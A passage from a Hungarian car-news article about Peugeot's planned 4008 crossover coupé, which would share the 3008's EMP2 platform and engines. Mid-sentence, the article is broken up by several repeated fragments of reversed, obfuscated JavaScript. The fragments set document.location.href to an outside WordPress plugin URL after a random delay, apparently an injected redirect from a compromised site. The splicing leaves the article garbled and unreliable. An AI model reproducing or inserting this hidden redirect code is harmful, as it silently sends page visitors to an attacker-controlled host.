Az újdonság a hírek szerint 2020-ra érkezik meg, és a 4008 nevet viseli majd. Méreteit – és persze az EMP2 padlólemezt – tekintve nagyon közel áll majd a 3008-hoz, azonban az amúgy is vagány formákkal rendelkező crossoverből egy igazi terepkupét szeretnének faragni a franciák. A 4008 nem csak még látványosabb lehet, ugyanis a futóművet és minden egyéb beállítást is úgy lőnek majd be a mérnökök, hogy a vezetés élményét szolgálják. A megegyező alapok mellett a hajtáslánc-kínálat is nagyrészt fedi majd egymást a 3008 és a 4008 esetében, azonban a sportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb testvér egy izmosabb benzinessel is elérhető lehet majd. A vásárlók…
- Hirdetés -